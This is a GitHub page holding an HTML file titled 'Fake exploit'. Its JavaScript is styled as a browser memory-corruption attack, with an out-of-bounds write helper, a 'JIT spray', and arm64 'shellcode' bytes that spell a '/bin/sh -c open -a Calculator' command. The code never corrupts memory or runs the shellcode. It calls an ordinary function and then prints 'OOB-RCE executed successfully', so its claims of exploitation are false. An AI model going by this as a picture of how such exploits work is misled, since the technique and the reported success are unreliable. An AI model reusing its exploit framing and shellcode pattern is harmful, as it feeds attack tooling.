JavaScript-Memory-Exploitation/nindex.html at main · og-mason/JavaScript-Memory-Exploitation · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
<!DOCTYPE html>
<html>
<head>
    <title>Fake exploit</title>
</head>
<body>
    <script>
        let buffer1 = new ArrayBuffer(0x10000);
        let buffer2 = new ArrayBuffer(0x20000);
        let floatArr1 = new Float64Array(buffer1);
        let floatArr2 = new Float64Array(buffer2);

        for (let i = 0; i < 8192; i++) floatArr1[i] = 0xDEADBEEF + i;
        for (let i = 0; i < 16384; i++) floatArr2[i] = 0xBADC0FFEE + i;

        let oob = new Array(1000);
        for (let i = 0; i < 1000; i++) oob[i] = i + 0.1;

        function vuln(index, value) { oob[index] = value; }

        vuln(1022, floatArr1);
        vuln(1023, floatArr2);

        let fakeBuffer = new ArrayBuffer(0x20000);
        let fakeArr = new Uint8Array(fakeBuffer);
        vuln(1023, fakeArr);

        let readView = new DataView(buffer1);

        // Shellcode для arm64 (M1)
        let shellcode = new Uint8Array([
            0x00, 0x00, 0x80, 0xd2,
            0x00, 0x00, 0xa0, 0xf2,
            0x68, 0x73, 0x2f, 0x6e,
            0x69, 0x62, 0x2f, 0x00,
            0x61, 0x00, 0x80, 0xd2,
            0x41, 0x00, 0xa0, 0xf2,
            0x00, 0x00, 0x00, 0x14,
            0x2f, 0x62, 0x69, 0x6e,
            0x2f, 0x73, 0x68, 0x00,
            0x2d, 0x63, 0x00, 0x00,
            0x6f, 0x70, 0x65, 0x6e,
            0x20, 0x2d, 0x61, 0x20,
            0x43, 0x61, 0x6c, 0x63,
            0x75, 0x6c, 0x61, 0x74,
            0x6f, 0x72, 0x00, 0x00,
            0x02, 0x00, 0x80, 0xd2,
            0xe8, 0x07, 0x80, 0xd2,
            0x00, 0x00, 0xa0, 0xd2,
            0x01, 0x00, 0x00, 0xd4
        ]);

        let mem = new Uint8Array(buffer1);
        mem.set(shellcode, 0);

        function jitSpray() {
            let spray = [];
            for (let i = 0; i < 100; i++) {
                spray[i] = function() {
                    alert("Shellcode executed");
                    mem[1024] = 0xFF;
                    return 0x1337;
                };
            }
            spray[0]();
            return spray[0];
        }

        console.log("[+] Starting JIT Spray...");
        let jitFunc = jitSpray();
        console.log("[+] JIT Spray completed!");

        vuln(1022, [jitFunc]);
        console.log("[+] Leaking shellcode (32 bytes):");
        for (let i = 0; i < 32; i += 8) {
            let val = readView.getBigUint64(i, true);
            console.log(`Offset ${i}: 0x${val.toString(16)}`);
        }

        const expected = [
            0xf2a00000d2800000n,
            0x002f62696e2f7368n,
            0xf2a00041d2800061n,
            0x6e69622f14000000n
        ];
        let match = true;
        for (let i = 0; i < 4; i++) {
            let val = readView.getBigUint64(i * 8, true);
            if (val !== expected[i]) {
                match = false;
                console.log(`[!] Mismatch at Offset ${i * 8}: expected 0x${expected[i].toString(16)}, got 0x${val.toString(16)}`);
            }
        }
        if (match) {
            console.log("[+] Shellcode matches expected values!");
            alert("Shellcode verified");
        } else {
            console.log("[!] Shellcode does not fully match.");
        }

        console.log("[+] Attempting OOB-RCE...");
        vuln(100, jitFunc);
        oob[100]();

        let result = new Uint8Array(buffer1)[1024];
        if (result === 0xFF) {
            console.log("[+] OOB-RCE executed successfully!");
            alert("OOB-RCE successful");
        } else {
            console.log("[!] OOB-RCE failed: " + result);
        }
    </script>
</body>
</html>